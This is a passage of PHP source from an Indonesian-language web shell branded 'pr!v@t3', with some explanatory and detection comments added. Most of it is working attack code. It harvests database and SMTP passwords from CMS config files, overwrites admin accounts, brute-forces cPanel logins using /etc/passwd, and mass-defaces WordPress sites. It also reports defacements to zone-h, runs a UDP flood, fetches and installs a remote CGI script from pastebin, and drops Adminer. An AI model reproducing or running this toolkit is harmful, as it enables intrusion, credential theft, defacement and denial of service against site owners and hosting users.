  2499. $result = mysql_fetch_array($q);
  2500. $id = $result[user_id];
  2501. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2502. $result2 = mysql_fetch_array($q2);
  2503. $target = $result2[value];
  2504. if($target == '') {
  2505. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2506. } else {
  2507. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2508. }
  2509. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2510. echo "Config => ".$file_conf."<br>";
  2511. echo "CMS => Magento<br>";
  2512. echo $url_target;
  2513. if(!$update OR !$conn OR !$db) {
  2514. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2515. } else {
  2516. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2517. }
  2518. mysql_close($conn);
  2519. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2520. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2521. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2522. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2523. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2524. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2525. $prefix = $dbprefix."user";
  2526. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2527. $db = mysql_select_db($dbname);
  2528. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2529. $result = mysql_fetch_array($q);
  2530. $id = $result[user_id];
  2531. $target = ambilkata($config,"HTTP_SERVER', '","'");
  2532. if($target == '') {
  2533. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2534. } else {
  2535. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2536. }
  2537. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2538. echo "Config => ".$file_conf."<br>";
  2539. echo "CMS => OpenCart<br>";
  2540. echo $url_target;
  2541. if(!$update OR !$conn OR !$db) {
  2542. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2543. } else {
  2544. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2545. }
  2546. mysql_close($conn);
  2547. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2548. $dbhost = ambilkata($config,'server = "','"');
  2549. $dbuser = ambilkata($config,'username = "','"');
  2550. $dbpass = ambilkata($config,'password = "','"');
  2551. $dbname = ambilkata($config,'database = "','"');
  2552. $prefix = "users";
  2553. $option = "identitas";
  2554. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2555. $db = mysql_select_db($dbname);
  2556. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2557. $result = mysql_fetch_array($q);
  2558. $target = $result[alamat_website];
  2559. if($target == '') {
  2560. $target2 = $result[url];
  2561. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2562. if($target2 == '') {
  2563. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2564. } else {
  2565. $cek_login3 = file_get_contents("$target2/adminweb/");
  2566. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2567. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2568. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2569. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2570. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2571. } else {
  2572. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2573. }
  2574. }
  2575. } else {
  2576. $cek_login = file_get_contents("$target/adminweb/");
  2577. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2578. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2579. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2580. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2581. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2582. } else {
  2583. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2584. }
  2585. }
  2586. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2587. echo "Config => ".$file_conf."<br>";
  2588. echo "CMS => Lokomedia<br>";
  2589. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2590. echo $url_target2;
  2591. } else {
  2592. echo $url_target;
  2593. }
  2594. if(!$update OR !$conn OR !$db) {
  2595. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2596. } else {
  2597. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2598. }
  2599. mysql_close($conn);
  2600. }
  2601. }
  2602. }
  2603. } else {
  2604. echo "<center>
  2605. <h1>Auto Edit User Config</h1>
  2606. <form method='post'>
  2607. DIR Config: <br>
  2608. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2609. Set User & Pass: <br>
  2610. <input type='text' name='user_baru' value='pr!v@t3' placeholder='user_baru'><br>
  2611. <input type='text' name='pass_baru' value='pr!v@t3' placeholder='pass_baru'><br>
  2612. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2613. </form><br>
  2614. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2615. ";
  2616. }
  2617. } elseif($_GET['do'] == 'cpanel') {
  2618. if($_POST['crack']) {
  2619. $usercp = explode("\r\n", $_POST['user_cp']);
  2620. $passcp = explode("\r\n", $_POST['pass_cp']);
  2621. $i = 0;
  2622. foreach($usercp as $ucp) {
  2623. foreach($passcp as $pcp) {
  2624. if(@mysql_connect('localhost', $ucp, $pcp)) {
  2625. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2626. } else {
  2627. $_SESSION[$ucp] = "1";
  2628. $_SESSION[$pcp] = "1";
  2629. if($ucp == '' || $pcp == '') {
  2630.  
  2631. } else {
  2632. $i++;
  2633. if(function_exists('posix_getpwuid')) {
  2634. $domain_cp = file_get_contents("/etc/named.conf");
  2635. if($domain_cp == '') {
  2636. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  2637. } else {
  2638. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2639. foreach($domains_cp[1] as $dj) {
  2640. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2641. $user_cp_url = $user_cp_url['name'];
  2642. if($user_cp_url == $ucp) {
  2643. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  2644. break;
  2645. }
  2646. }
  2647. }
  2648. } else {
  2649. $dom = "<font color=red>function is Disable by system</font>";
  2650. }
  2651. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  2652. }
  2653. }
  2654. }
  2655. }
  2656. }
  2657. if($i == 0) {
  2658. } else {
  2659. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>pr!v@t3.</font>";
  2660. }
  2661. } else {
  2662. echo "<center>
  2663. <form method='post'>
  2664. USER: <br>
  2665. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2666. $_usercp = fopen("/etc/passwd","r");
  2667. while($getu = fgets($_usercp)) {
  2668. if($getu == '' || !$_usercp) {
  2669. echo "<font color=red>Can't read /etc/passwd</font>";
  2670. } else {
  2671. preg_match_all("/(.*?):x:/", $getu, $u);
  2672. foreach($u[1] as $user_cp) {
  2673. if(is_dir("/home/$user_cp/public_html")) {
  2674. echo "$user_cp\n";
  2675. }
  2676. }
  2677. }
  2678. }
  2679. echo "</textarea><br>
  2680. PASS: <br>
  2681. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2682. function cp_pass($dir) {
        // Credential harvester: reads every regular file directly inside $dir (no
        // recursion), recognises application config files by marker strings, pulls
        // the database password out of each and echoes the collected values, one
        // per line. Nothing is returned.
        // ambilkata() is defined outside this excerpt; from its call sites it
        // appears to return the text found between two delimiters - TODO confirm.
        // Defensive takeaway: the function only works where config files are
        // readable by the web server account it runs under, and the surrounding
        // form feeds the harvested values back in as candidate account passwords,
        // so tight file permissions and not reusing a database password for any
        // login both cut this off.
  2683. $pass = "";
  2684. $dira = scandir($dir);
  2685. foreach($dira as $dirb) {
  2686. if(!is_file("$dir/$dirb")) continue;
  2687. $ambil = file_get_contents("$dir/$dirb");
        // Each branch keys on text found in the file and uses the matching
        // delimiter pair for that configuration format.
  2688. if(preg_match("/WordPress/", $ambil)) {
  2689. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2690. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2691. $pass .= ambilkata($ambil,"password = '","'")."\n";
  2692. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2693. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2694. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2695. $pass .= ambilkata($ambil,'password = "','"')."\n";
  2696. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2697. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2698. } elseif(preg_match("/^[client]$/", $ambil)) {
  2699. preg_match("/password=(.*?)/", $ambil, $pass1);
  2700. if(preg_match('/"/', $pass1[1])) {
  2701. $pass1[1] = str_replace('"', "", $pass1[1]);
  2702. $pass .= $pass1[1]."\n";
  2703. } else {
  2704. $pass .= $pass1[1]."\n";
  2705. }
  2706. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2707. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2708. }
  2709. }
  2710. echo $pass;
  2711. }
  2712. $cp_pass = cp_pass($dir);
  2713. echo $cp_pass;
  2714. echo "</textarea><br>
  2715. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2716. </form>
  2717. <br><span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2718. }
  2719. } elseif($_GET['do'] == 'smtp') {
  2720. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  // scj($dir): reads every regular file directly inside $dir, removes all "$"
  // characters from the content, and for files matching "JConfig" or "joomla"
  // extracts the six SMTP settings (host, auth, user, pass, port, secure) with
  // ambilkata(), which is defined outside this excerpt; presumably it returns
  // the text between the two given delimiters (confirm).
  // The values are echoed as HTML without escaping; the function returns nothing.
  // Defender view: SMTP credentials stored in a Joomla configuration file that the
  // web server account can read should be treated as disclosed once this script
  // has been present on the host, and rotated.
  2721. function scj($dir) {
  2722. $dira = scandir($dir);
  2723. foreach($dira as $dirb) {
  2724. if(!is_file("$dir/$dirb")) continue; // only regular files in $dir itself; no recursion
  2725. $ambil = file_get_contents("$dir/$dirb");
  2726. $ambil = str_replace("$", "", $ambil); // drops "$" so the delimiters below match "smtphost = '" without the PHP variable sigil
  2727. if(preg_match("/JConfig|joomla/", $ambil)) {
  2728. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2729. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2730. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2731. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2732. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2733. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2734. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  2735. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  2736. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  2737. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  2738. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  2739. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  2740. }
  2741. }
  2742. }
  2743. $smpt_hunter = scj($dir);
  2744. echo $smpt_hunter;
  2745. } elseif($_GET['do'] == 'auto_wp') {
  2746. if($_POST['hajar']) {
  2747. $title = htmlspecialchars($_POST['new_title']);
  2748. $pn_title = str_replace(" ", "-", $title);
  2749. if($_POST['cek_edit'] == "Y") {
  2750. $script = $_POST['edit_content'];
  2751. } else {
  2752. $script = $title;
  2753. }
  2754. $conf = $_POST['config_dir'];
  2755. $scan_conf = scandir($conf);
  2756. foreach($scan_conf as $file_conf) {
  2757. if(!is_file("$conf/$file_conf")) continue;
  2758. $config = file_get_contents("$conf/$file_conf");
  2759. if(preg_match("/WordPress/", $config)) {
  2760. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2761. $dbuser = ambilkata($config,"DB_USER', '","'");
  2762. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2763. $dbname = ambilkata($config,"DB_NAME', '","'");
  2764. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2765. $prefix = $dbprefix."posts";
  2766. $option = $dbprefix."options";
  2767. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2768. $db = mysql_select_db($dbname);
  2769. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2770. $result = mysql_fetch_array($q);
  2771. $id = $result[ID];
  2772. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2773. $result2 = mysql_fetch_array($q2);
  2774. $target = $result2[option_value];
  2775. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2776. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2777. echo "<div style='margin: 5px auto;'>";
  2778. if($target == '') {
  2779. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2780. } else {
  2781. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2782. }
  2783. if(!$update OR !$conn OR !$db) {
  2784. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2785. } else {
  2786. echo "<font color=lime>sukses di ganti.</font><br>";
  2787. }
  2788. echo "</div>";
  2789. mysql_close($conn);
  2790. }
  2791. }
  2792. } else {
  2793. echo "<center>
  2794. <h1>Auto Edit Title+Content WordPress</h1>
  2795. <form method='post'>
  2796. DIR Config: <br>
  2797. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2798. Set Title: <br>
  2799. <input type='text' name='new_title' value='Hacked by pr!v@t3' placeholder='New Title'><br><br>
  2800. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2801. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2802. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2803. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2804. </form>
  2805. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2806. ";
  2807. }
  2808. } elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  2809. } elseif($_GET['do'] == 'zoneh') {
  2810. if($_POST['submit']) {
  2811. $domain = explode("\r\n", $_POST['url']);
  2812. $nick = $_POST['nick'];
  2813. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2814. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  // zoneh($url, $nick): sends one HTTP POST to the notification form at
  // http://www.zone-h.com/notify/single carrying the fields defacer, domain1,
  // hackmode, reason and submit, and returns the response body as a string.
  // The caller checks that body for an "OK" marker.
  // Detection: a web server process making an outbound POST to this endpoint is
  // an indicator that a defacement of a hosted site is being self-reported.
  2815. function zoneh($url,$nick) {
  2816. $ch = curl_init("http://www.zone-h.com/notify/single");
  2817. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2818. curl_setopt($ch, CURLOPT_POST, true);
  2819. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2820. return curl_exec($ch);
  2821. curl_close($ch); // not reached: follows the return
  2822. }
  2823. foreach($domain as $url) {
  2824. $zoneh = zoneh($url,$nick);
  2825. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2826. echo "$url -> <font color=lime>OK</font><br>";
  2827. } else {
  2828. echo "$url -> <font color=red>ERROR</font><br>";
  2829. }
  2830. }
  2831. } else {
  2832. echo "<center><form method='post'>
  2833. <u>Defacer</u>: <br>
  2834. <input type='text' name='nick' size='50' value='pr!v@t3'><br>
  2835. <u>Domains</u>: <br>
  2836. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2837. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2838. </form>";
  2839. }
  2840. echo "</center>";
  2841. }elseif($_GET['do'] == 'ddos'){
  2842. echo '
  2843. <form action="" method="post">';
  2844. echo "
  2845. <center><br><br><br>
  2846. Your IP: <font color='red'><b>";
  2847. echo $my_ip;
  2848. echo "
  2849. </b></font>&nbsp;(Don't DdoS yourself nub)<br><br>
  2850. <center>
  2851. <table class='tabnet' style='margin-left:35%;width:30%;padding:0 1px;'>
  2852. <th colspan='5'>Ddos Tool</th>
  2853. <tr><tr><td>IP Target</td><td>:</td>
  2854. <td><input type='text' class='inputz' name='ip' size='48' maxlength='25' value = '0.0.0.0' onblur = 'if ( this.value=='' ) this.value = '0.0.0.0';' onfocus = ' if ( this.value == '0.0.0.0' ) this.value = '';'/>
  2855. </td></tr>
  2856. <tr><td>Time</td><td>:</td>
  2857. <td><input type='text' class='inputz' name='time' size='48' maxlength='25' value = 'time (in seconds)' onblur = 'if ( this.value=='' ) this.value = 'time (in seconds)';' onfocus = ' if ( this.value == 'time (in seconds)' ) this.value = '';'/>
  2858. </td></tr>
  2859. <tr><td>Port</td><td>:</td>
  2860. <td><input type='text' class='inputz' name='port' size='48' maxlength='5' value = 'port' onblur = 'if ( this.value=='' ) this.value = '6969';' onfocus = ' if ( this.value == '6969' ) this.value = '';'/>
  2861. </td></tr></tr></b><br><tr><td>
  2862. <input type='submit' class='inputzbut' name='fire' value=' Firee !!! ' style='margin-left:200%;'>
  2863. <br><br></td></tr></table>
  2864. <center>
  2865. After initiating the DoS attack, please wait while the browser loads.
  2866. </center>
  2867.  
  2868. </form>
  2869. </center>";
  2870. $submit = $_POST['fire'];
  2871. if (isset($submit)) {
  2872. $packets = 0;
  2873. $ip = $_POST['ip'];
  2874. $rand = $_POST['port'];
  2875. set_time_limit(0);
  2876. ignore_user_abort(FALSE);
  2877. $exec_time = $_POST['time'];
  2878. $time = time();
  2879. print "Flooded: $ip on port $rand <br><br>";
  2880. $max_time = $time + $exec_time;
  2881. for ($i = 0;$i < 65535;$i++) {
  2882. $out.= "X";
  2883. }
  2884. while (1) {
  2885. $packets++;
  2886. if (time() > $max_time) {
  2887. break;
  2888. }
  2889. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  2890. if ($fp) {
  2891. fwrite($fp, $out);
  2892. fclose($fp);
  2893. }
  2894. }
  2895. echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
  2896. ";
  2897. }
  2898. } elseif($_GET['do'] == 'cgi') {
  2899. $cgi_dir = mkdir('priv_cgi', 0755);
  2900. $file_cgi = "priv_cgi/cgi.izo";
  2901. $isi_htcgi = "AddHandler cgi-script .izo";
  2902. $htcgi = fopen(".htaccess", "w");
  2903. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  2904. $cgi = fopen($file_cgi, "w");
  2905. fwrite($cgi, $cgi_script);
  2906. fwrite($htcgi, $isi_htcgi);
  2907. chmod($file_cgi, 0755);
  2908. echo "<iframe src='priv_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2909. } elseif($_GET['do'] == 'fake_root') {
  2910. ob_start();
  2911. $cwd = getcwd();
  2912. $ambil_user = explode("/", $cwd);
  2913. $user = $ambil_user[2];
  2914. if($_POST['reverse']) {
  2915. $site = explode("\r\n", $_POST['url']);
  2916. $file = $_POST['file'];
  2917. foreach($site as $url) {
  2918. $cek = getsource("$url/~$user/$file");
  2919. if(preg_match("/hacked/i", $cek)) {
  2920. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  2921. }
  2922. }
  2923. } else {
  2924. echo "<center><form method='post'>
  2925. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  2926. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  2927. Domain: <br>
  2928. <textarea style='width: 450px; height: 250px;' name='url'>";
  2929. reverse($_SERVER['HTTP_HOST']);
  2930. echo "</textarea><br>
  2931. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  2932. </form><br>
  2933. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  2934. }
  2935. } elseif($_GET['do'] == 'adminer') {
  2936. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  // adminer($url, $isi): opens the local path $isi for writing and fetches $url
  // with cURL, passing the file handle as CURLOPT_FILE; TLS peer verification is
  // switched off for the transfer. Returns whatever curl_exec() returns.
  // The caller passes the Adminer 4.2.4 download URL and the name "adminer.php"
  // in the current directory, then links to it.
  // Detection: an adminer.php that the site owner did not deploy, appearing next
  // to other unexpected PHP files, is an indicator of this tool having run.
  2937. function adminer($url, $isi) {
  2938. $fp = fopen($isi, "w");
  2939. $ch = curl_init();
  2940. curl_setopt($ch, CURLOPT_URL, $url);
  2941. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2942. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2943. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // certificate of the download host is not checked
  2944. curl_setopt($ch, CURLOPT_FILE, $fp);
  2945. return curl_exec($ch);
  2946. curl_close($ch); // this line and the three below are not reached: they follow the return
  2947. fclose($fp);
  2948. ob_flush();
  2949. flush();
  2950. }
  2951. if(file_exists('adminer.php')) {
  2952. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2953. } else {
  2954. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2955. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2956. } else {
  2957. echo "<center><font color=red>gagal buat file adminer</font></center>";
  2958. }
  2959. }
  2960. } elseif($_GET['do'] == 'auto_dwp') {
  2961. if($_POST['auto_deface_wp']) {
  // anucurl($sites): fetches the URL in $sites with cURL and returns the response
  // body. Redirects are followed, the connect timeout is 5 seconds, TLS peer and
  // host verification are both disabled, and a fixed Firefox 32 / Windows NT 6.1
  // User-Agent string is sent.
  // Cookies are read from and written to 'cookie.txt' in the working directory,
  // which lets a later request reuse a session established by an earlier one.
  // Detection: a 'cookie.txt' created by the web server account inside a web
  // directory, and requests carrying this exact User-Agent that originate from
  // the server itself, are both indicators.
  2962. function anucurl($sites) {
  2963. $ch = curl_init($sites);
  2964. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2965. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2966. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2967. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2968. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2969. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2970. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2971. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2972. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2973. $data = curl_exec($ch);
  2974. curl_close($ch);
  2975. return $data;
  2976. }
  // lohgin($cek, $web, $userr, $pass, $wp_submit): sends an HTTP POST to $cek
  // with the WordPress login form fields log, pwd, rememberme, wp-submit,
  // redirect_to and testcookie, and returns the response body.
  // Redirects are followed, TLS peer and host verification are disabled, and the
  // session cookies are kept in 'cookie.txt' in the working directory.
  // The caller uses it after overwriting a row of the users table, so the login
  // succeeds with credentials the site owner never set.
  // Detection: a wp-login.php POST whose source address is the hosting server
  // itself, with the fixed User-Agent below, followed by an administrator login
  // for an account whose name changed without an audit trail.
  2977. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2978. $post = array(
  2979. "log" => "$userr",
  2980. "pwd" => "$pass",
  2981. "rememberme" => "forever",
  2982. "wp-submit" => "$wp_submit",
  2983. "redirect_to" => "$web",
  2984. "testcookie" => "1",
  2985. );
  2986. $ch = curl_init($cek);
  2987. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2988. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2989. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2990. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2991. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2992. curl_setopt($ch, CURLOPT_POST, 1);
  2993. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2994. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2995. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2996. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2997. $data = curl_exec($ch);
  2998. curl_close($ch);
  2999. return $data;
  3000. }
  3001. $scan = $_POST['link_config'];
  3002. $link_config = scandir($scan);
  3003. $script = htmlspecialchars($_POST['script']);
  3004. $user = "pr!v@t3";
  3005. $pass = "pr!v@t3";
  3006. $passx = md5($pass);
  3007. foreach($link_config as $dir_config) {
  3008. if(!is_file("$scan/$dir_config")) continue;
  3009. $config = file_get_contents("$scan/$dir_config");
  3010. if(preg_match("/WordPress/", $config)) {
  3011. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3012. $dbuser = ambilkata($config,"DB_USER', '","'");
  3013. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3014. $dbname = ambilkata($config,"DB_NAME', '","'");
  3015. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3016. $prefix = $dbprefix."users";
  3017. $option = $dbprefix."options";
  3018. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3019. $db = mysql_select_db($dbname);
  3020. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3021. $result = mysql_fetch_array($q);
  3022. $id = $result[ID];
  3023. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3024. $result2 = mysql_fetch_array($q2);
  3025. $target = $result2[option_value];
  3026. if($target == '') {
  3027. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3028. } else {
  3029. echo "[+] $target <br>";
  3030. }
  3031. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3032. if(!$conn OR !$db OR !$update) {
  3033. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3034. mysql_close($conn);
  3035. } else {
  3036. $site = "$target/wp-login.php";
  3037. $site2 = "$target/wp-admin/theme-install.php?upload";
  3038. $b1 = anucurl($site2);
  3039. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3040. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3041. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
